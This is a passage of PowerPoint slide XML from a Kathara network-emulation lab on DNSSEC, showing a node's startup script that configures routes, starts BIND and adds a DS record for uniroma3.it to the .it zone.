                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6586E48-0763-548A-E77D-7089600BEF8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="1667" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsit.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E75E1ED-1AD6-37F9-FD2D-696BB38C349C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14EFB309-86FA-CFB8-F9E5-2B0F77D0D894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1753436-BE3A-1254-FF60-E88168095204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A3A26C-DCB8-4CB1-AABE-B8C0B14B63EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8445741" y="1771168"/>
            <a:ext cx="3405443" cy="1886432"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90759"/>
              <a:gd name="adj2" fmla="val 84729"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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it-IT" dirty="0"/>
              <a:t>Interroga ripetutamente il server dell'Università (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>dnsuni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, IP 110.0.0.10) chiedendo le sue chiavi pubbliche (DNSKEY) per la zona uniroma3.it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0AAE9F5-E7C2-7CFA-DFDC-F8CE41868B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7006848" y="4643252"/>
            <a:ext cx="3405443" cy="760022"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -135046"/>
              <a:gd name="adj2" fmla="val -51138"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0"/>
              <a:t>adds a blank line to the end of the .it TLD zone file (db.it)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28073904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3CFEEA-D157-E807-6EE4-890A6300AD9E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF42E715-7A3B-BA29-B532-C730C16A6CE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="514597" y="1138080"/>
            <a:ext cx="11336587" cy="5000627"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9171" cy="1761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2753F5-A721-40A7-D1FA-C9AE70DFDF98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9171" cy="1703"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 10.0.3.10/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 110.0.0.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 210.0.3.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 200.1.1.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 195.0.10.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  while ! dig @110.0.0.10 uniroma3.it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @110.0.0.10 uniroma3.it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - uniroma3.it &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC812BDE-A321-48DF-55BF-DA283EC4847C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="1667" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsit.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B19FBA10-EB81-165F-FA0E-39E9B7586985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
